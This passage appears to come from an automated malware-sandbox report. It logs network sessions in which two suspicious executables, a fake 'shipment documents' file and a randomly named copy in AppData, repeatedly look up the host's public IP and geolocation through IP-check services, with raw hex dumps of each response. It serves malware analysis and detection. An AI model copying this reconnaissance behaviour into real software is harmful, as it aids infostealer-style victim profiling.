                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                    Oct 11, 2024 09:35:21.261548042 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:21.471304893 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:21 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 5074595cc6ece634abbf1a5aa3f65b70
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.449739132.226.247.73807768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:20.430373907 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:21.096147060 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:20 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 58f8a8c67194d528afb001cd9be54295
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.449743132.226.247.73807768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:21.694551945 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:22.381772041 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:22 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 2e900d54ced6b7be60f9d3a0d7774a94
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    4192.168.2.449744132.226.247.73808136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:22.090209007 CEST127OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Oct 11, 2024 09:35:22.754828930 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:22 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 83c50c5da8485f990b581e20dfef45ff
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    5192.168.2.449747132.226.247.73807768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:23.046443939 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:23.718689919 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:23 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 605d1ead0d7a7faecb146c791b8e7142
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    6192.168.2.449748132.226.247.73808136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:23.389908075 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:24.079411983 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:23 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 597bed303afd75dbc76ed96699ee7a8c
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    7192.168.2.449751132.226.247.73807768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:24.356801033 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:25.028584957 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:24 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 607f0d06f6333d37e7635fc25491abe8
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    8192.168.2.449752132.226.247.73808136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:24.698442936 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:25.362610102 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:25 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: f4159d9fcb6eb2024ece26655d2a8723
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    9192.168.2.449755132.226.247.73807768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:25.644639969 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:26.318897963 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: fc272f3232c7b23c18dd822ed8c05d0e
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    10192.168.2.449756132.226.247.73808136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:25.983186007 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:26.655930996 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:26 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 7d5d61084874855c9cb89c0e1fafa04b
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    11192.168.2.449759132.226.247.73807768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:26.983357906 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:27.674367905 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:27 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: a5fd577165439802edf940f3b649e14b
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    12192.168.2.449760132.226.247.73808136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:27.408684969 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:28.071233988 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:27 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: d2db1517ce00b569d190494ab3705947
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    13192.168.2.449763132.226.247.73807768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:28.289654970 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:28.953393936 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:28 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: dbb51839ccbd7a618c9b7743c2aad139
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    14192.168.2.449764132.226.247.73808136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:28.694603920 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:29.394510031 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:29 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: b4a7c914b1eee4b45006f03c012fe24b
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    15192.168.2.449768132.226.247.73808136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    Oct 11, 2024 09:35:30.023770094 CEST151OUTGET / HTTP/1.1
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                    Host: checkip.dyndns.org
                                                    Connection: Keep-Alive
                                                    Oct 11, 2024 09:35:30.688242912 CEST320INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:30 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 103
                                                    Connection: keep-alive
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    X-Request-ID: 781319fcd30c2d818c148eacd2fda05a
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449734188.114.96.34437768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:19 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:19 UTC699INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: MISS
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cU%2FZMJXKNwcpmwEiqd9cVMr5%2Bh7xKFKObTxQhri6EVgkavrRLLmywWJ0n0u%2B%2Bmsg1K9FpQU0MC0NcG1iaqErJ4q4uBq7KAUHpY%2B99iZrhrUBMpoenMJ6ZqjPKdkJy60rKJVue0zX"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c38497c1815-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449738188.114.96.34437768C:\Users\user\Desktop\rShipmentDocuments.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:20 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    2024-10-11 07:35:20 UTC700INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:20 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 1
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KdLEw1RTyrgO1qBCOEfIayfxedSakvwbOY0DkiR7uLv3GH0UhBATZa9nq3AFYNR%2Bi%2F4pGhC0ajgwQvMFsYXGWjsHNDyOidFwyXbFPESQ4b1KAcLWqAfzntcF5xDKs5PbGYPIB4kB"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c404c960f63-EWR
                                                    alt-svc: h3=":443"; ma=86400
                                                    2024-10-11 07:35:20 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                    2024-10-11 07:35:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.449740188.114.96.34438136C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-10-11 07:35:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                    Host: reallyfreegeoip.org
                                                    Connection: Keep-Alive
                                                    2024-10-11 07:35:21 UTC702INHTTP/1.1 200 OK
                                                    Date: Fri, 11 Oct 2024 07:35:21 GMT
                                                    Content-Type: application/xml
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    access-control-allow-origin: *
                                                    vary: Accept-Encoding
                                                    Cache-Control: max-age=86400
                                                    CF-Cache-Status: HIT
                                                    Age: 2
                                                    Last-Modified: Fri, 11 Oct 2024 07:35:19 GMT
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yEU%2B8CHXIMo9HU4t2lECYw9aTeh3R3F4P6MBQRrtCHscTy9fZa3GBJAW41Vj4GJ5TBN3Co0l7nijtzncjETD7aQjJtYLfgpJacYXzoG8e8EPDYy9z%2BgHqcbH%2FkOHG79iShMG20I3"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8d0d2c457ac34358-EWR
                                                    alt-svc: h3=":443"; ma=86400
